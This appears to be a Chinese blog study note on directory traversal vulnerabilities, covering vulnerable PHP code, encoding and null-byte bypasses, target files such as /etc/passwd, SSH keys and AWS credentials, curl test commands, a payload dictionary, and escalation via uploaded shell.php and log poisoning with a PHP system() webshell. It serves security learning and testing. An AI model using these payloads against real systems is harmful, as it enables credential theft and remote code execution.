当前位置: 首页 > news >正文

目录遍历漏洞学习

目录遍历漏洞,又称路径遍历漏洞,是Web安全领域中最常见的高危漏洞之一。攻击者利用此漏洞可以访问应用程序预期目录之外的文件和目录,导致敏感数据泄露甚至系统完全沦陷。

核心机制


危害类型影响程度示例
敏感数据泄露⭐⭐⭐⭐⭐配置文件、数据库凭证
系统文件读取⭐⭐⭐⭐/etc/passwd、注册表
源代码泄露⭐⭐⭐⭐.git、.env 文件
任意文件写入⭐⭐⭐⭐⭐Webshell上传
权限提升⭐⭐⭐⭐⭐读取SSH密钥

根本原因

// 典型漏洞代码示例
$file = $_GET['file'];
readfile("/var/www/uploads/" . $file);

攻击者输入:../../etc/passwd
实际访问路径:/var/www/uploads/../../etc/passwd = /etc/passwd

常见错误模式

  • 未过滤用户输入:直接拼接路径

  • 过滤不充分:仅检查部分关键词

  • 编码处理缺陷:未规范化解码

  • 权限配置不当:Web服务器权限过高


攻击

基础攻击手法

GET /download?file=../../../../etc/passwd HTTP/1.1
Host: vulnerable.com

高级绕过技术

过滤机制绕过方式示例
基础过滤URL编码..%2f..%2fetc%2fpasswd
关键词检测双重编码%252e%252e%252fetc%252fpasswd
路径截断空字节../../../etc/passwd%00.jpg
特殊字符超长路径....//....//etc/passwd
扩展名限制伪协议php://filter/convert.base64-encode/resource=config.php

操作系统特定Payload

Linux/Unix

/etc/passwd
/proc/self/environ
~/.ssh/id_rsa
/var/log/auth.log

Windows

C:\Windows\win.ini
C:\Windows\System32\drivers\etc\hosts
..\..\..\Windows\repair\SAM


手动检测

# 基础检测
curl http://site.com?file=../../../../etc/passwd# 编码绕过检测
curl http://site.com?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd# 空字节测试
curl http://site.com?file=../../../etc/passwd%00.png

自动化工具

工具类型特点
Burp Suite专业工具Intruder模块+自定义字典
OWASP ZAP开源扫描器自动路径遍历检测
ffuf命令行工具快速模糊测试
DotDotPwn专用扫描器多协议支持

字典示例

../../../etc/passwd
..%2f..%2f..%2fetc%2fpasswd
....//....//etc/passwd
%C0%AE%C0%AE%2F (UTF-8编码)

案例

Apache HTTP Server (CVE-2021-41773)

Apahce HTTPd 2.4.49(CVE-2021-41773)漏洞复现详细教程_apatch cve-2021-41773 修复-CSDN博客https://blog.csdn.net/weixin_40412037/article/details/120777496CVE-2021-41773 Apache HTTP Server 路径穿越漏洞复现 - FreeBuf网络安全行业门户https://www.freebuf.com/articles/web/293172.html

WordPress插件漏洞

WordPress LayerSlider 插件存在SQL注入漏洞-CVE-2024-2879分析-先知社区https://xz.aliyun.com/news/14161高危WordPress插件漏洞威胁超1万个网站安全 - FreeBuf网络安全行业门户https://www.freebuf.com/articles/web/431480.htmlWordPress插件SQL注入漏洞——漏洞复现_wordpress sql注入复现-CSDN博客https://blog.csdn.net/weixin_40412037/article/details/110087518

高级利用技巧

结合文件上传

POST /upload.php HTTP/1.1
...
Content-Disposition: form-data; name="file"; filename="../../public_html/shell.php"

日志文件注入

GET /<?php system($_GET['cmd']); ?> HTTP/1.1
...
# 通过遍历读取日志执行代码
GET /view?file=../../logs/access.log&cmd=id

环境文件泄露

/proc/self/environ       # 包含环境变量
~/.bash_history         # 历史命令
~/.aws/credentials      # AWS凭证

其他

目录遍历漏洞详解-CSDN博客https://blog.csdn.net/weixin_39190897/article/details/103589535WEB漏洞|目录浏览(目录遍历)漏洞和任意文件读取/下载漏洞-腾讯云开发者社区-腾讯云https://cloud.tencent.com/developer/article/1933531从0到1完全掌握目录遍历漏洞 - FreeBuf网络安全行业门户https://www.freebuf.com/articles/web/326213.html

http://www.dtcms.com/a/317595.html

相关文章:

  • 概率/期望 DP Jon and Orbs
  • 低代码系统的技术深度:超越“可视化操作”的架构与实现挑战
  • 基于51单片机的温控风扇Protues仿真设计
  • 【FAQ】Script导出SharePoint 目录文件列表并统计大小
  • SQL167 SQL类别高难度试卷得分的截断平均值
  • Tdesign-React 请求接口 415 问题借助 chatmaster 模型处理记录
  • Solidity 编程进阶
  • docker容器临时文件去除,服务器容量空间
  • leetcode643:子数组最大平均数 I(滑动窗口入门之定长滑动窗口)
  • 上下文工程
  • .Net下载共享文件夹中的文件
  • excel名称管理器显示隐藏
  • Java高频方法总结
  • 排序算法归并排序
  • HarmonyOS应用开发环境搭建以及快速入门介绍
  • OpenAI隆重推出开源大模型:GPT-OSS
  • 面试题:基础的sql命令
  • Java NIO
  • 从 LinkedIn 到 Apache:Kafka 的架构设计与应用场景
  • 【25-cv-08899/08985】Lisa Audit 23张版权画作暴雷,Keith律所双案并发冻结跨境店铺!
  • Numpy科学计算与数据分析:Numpy入门之多平台安装与基础环境配置
  • Python 自动化与 Web 应用开发详细教案
  • 前端全栈修炼手册:从 Vue3 到工程化的进阶之路
  • Ethereum: 深入Hardhat Console, 我们的智能合约瑞士军刀
  • 微型导轨:智能家居抽屉的智能化应用
  • Text2SQL 智能问答系统开发-spider验证集(三)
  • 线程互斥与同步
  • C语言控制语句练习题1
  • 汽车以太网通信协议——SOME/IP
  • JTAG-SVF文件完整教程